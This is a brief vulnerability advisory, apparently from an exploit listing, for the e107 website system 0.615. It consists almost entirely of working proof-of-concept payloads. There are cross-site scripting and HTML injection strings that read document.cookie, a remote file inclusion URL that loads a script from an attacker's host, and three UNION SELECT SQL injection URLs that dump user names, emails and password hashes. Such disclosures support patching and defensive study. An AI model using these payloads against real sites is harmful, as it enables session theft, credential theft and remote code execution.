|
e107 Website System Multiple Vulnerabilities
A number of examples were provided. - Cross-site scripting: http://www.example.com/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/e107_0615/usersettings.php?avmsg=[xss code here] - HTML injection in the "email article to a friend" and "submit news" pages.: foobar'><body onload=alert(document.cookie);> - File inclusion: http://www.example.com/e107_0615/e107_handlers/secure_img_render.php?p=http://<attacker's host>/<attacker's script>.php - SQL injection: http://www.example.com/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null, null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/* http://www.example.com/e107_0615/content.php?query=content_id=99%20UNION%20select%20null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null, null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/* http://www.example.com/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null, null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/* |
|
|
Privacy Statement |